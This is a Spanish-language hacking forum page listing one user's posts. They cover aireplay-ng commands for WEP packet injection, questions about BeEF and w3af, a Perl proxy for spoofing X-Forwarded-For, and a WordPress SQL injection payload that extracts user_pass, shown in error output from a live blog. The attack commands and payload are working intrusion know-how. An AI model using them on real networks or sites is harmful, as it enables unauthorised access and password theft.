elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking Wireless / Problema aireplay-ng en: 2 Octubre 2010, 06:46 am
Hola,

Lo que hago:
Me pongo a capturar paquetes con airodump-ng.
Hago un fake client: aireplay-ng -1 10 -e "nombreAP" -a "macAP" -h mac-de-mi-placa-de-red-fake interfaz. Consigo autenticarme satisfactoriamente.
Intento una reinyeccion de arp: aireplay-ng -3 -b "macAP" -h mac-de-mi-placa-de-red-fake PERO no consiguo arp requests entonces no suben los IV's.

No se que hago mal. De todas maneras, otra forma de acelerar la captura de IV's es bienvenida.

Gracias
2  Seguridad Informática / Nivel Web / Alguien me puede explicar como funciona esto? BeEF en: 3 Marzo 2009, 00:26 am
Hola,
Estuve mirando esta herramienta(BeEF) bastante interesante por cierto. Lo que hace es explotar vulns en los browsers.
Hasta ahi capto la idea, pero no entiendo como utilizar esta herramienta. He intentado usarla localmente, pero esta muy limitada porque tiene que estar puesta justo en el dominio principal de un servidor.

Alguien ya la ha probado?

Gracias
3  Programación / Scripting / Se puede hacer esto? Perl en: 13 Diciembre 2008, 19:58 pm
Hola,
Queria saber si se puede hacer una cosa parecida a un proxy, nada mas que funcione de forma local y agrege algunos headers para hacer los request como otro ip.
En este caso el header que supongo serviria es el X-Forwarded-For. En fin, se puede hacer dicho script?

Aqui hay una idea nomas, pero no funciona, creo.

Código:
#!/usr/bin/perl -w
use HTTP::Proxy qw( :log );
use HTTP::Proxy::HeaderFilter::simple;
use strict;

# a simple IpSpoofing filter
my $filter = HTTP::Proxy::HeaderFilter::simple->new(
#?
sub { $_[0]->header( 'X-Forwarded-For' => '192.168.102.32' );}
);

# a simple ip generator
#$ip1= int(rand(30))+190;
#$ip2= int(rand(240));
#$ip3= int(rand(240));
#$ip4= int(rand(240));
#$ip = $ip1.".".$ip2.".".$ip3.".".$ip4;
   
# initialisation
my $proxy = HTTP::Proxy->new( port => 3128 );
$proxy->port( 3128 );
# this is a MainLoop-like method
$proxy->x_forwarded_for();
$proxy->push_filter(
    mime    => undef,
    request => HTTP::Proxy::HeaderFilter::simple->new(
        sub { $_[1]->remove_header(qw( User-Agent From Referer Cookie Cookie2 )) }
    ),
    response => HTTP::Proxy::HeaderFilter::simple->new(
        sub { $_[1]->remove_header(qw( Set-Cookie Set-Cookie2 )) }
    )
);
$proxy->via('');
$proxy->start;
$proxy->init();
print "Proxy started on port 3128 \n\n\n";
$proxy->push_filter(request => $filter);
print "Filtering??? \n\n\n";
4  Seguridad Informática / Nivel Web / Re: w3af - Web Application Attack and Audit Framework en: 28 Septiembre 2008, 06:47 am
Si, tambien lo he probado. Lo usan bastante con metasploit. En el foro de backtrack cada vez lo veo mas.
5  Seguridad Informática / Nivel Web / Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p en: 30 Diciembre 2007, 04:09 am
Lo probe en un blog de wordpress. No se que version es pero me responde esto:


Código:
WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND (((post_title LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#') OR (post_content LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#'))) AND post_type = 'post' AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10

Warning: Cannot modify header information - headers already sent by (output started at /home/jamiecar/public_html/wp-includes/wp-db.php:160) in /home/jamiecar/public_html/wp-includes/pluggable.php on line 391
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines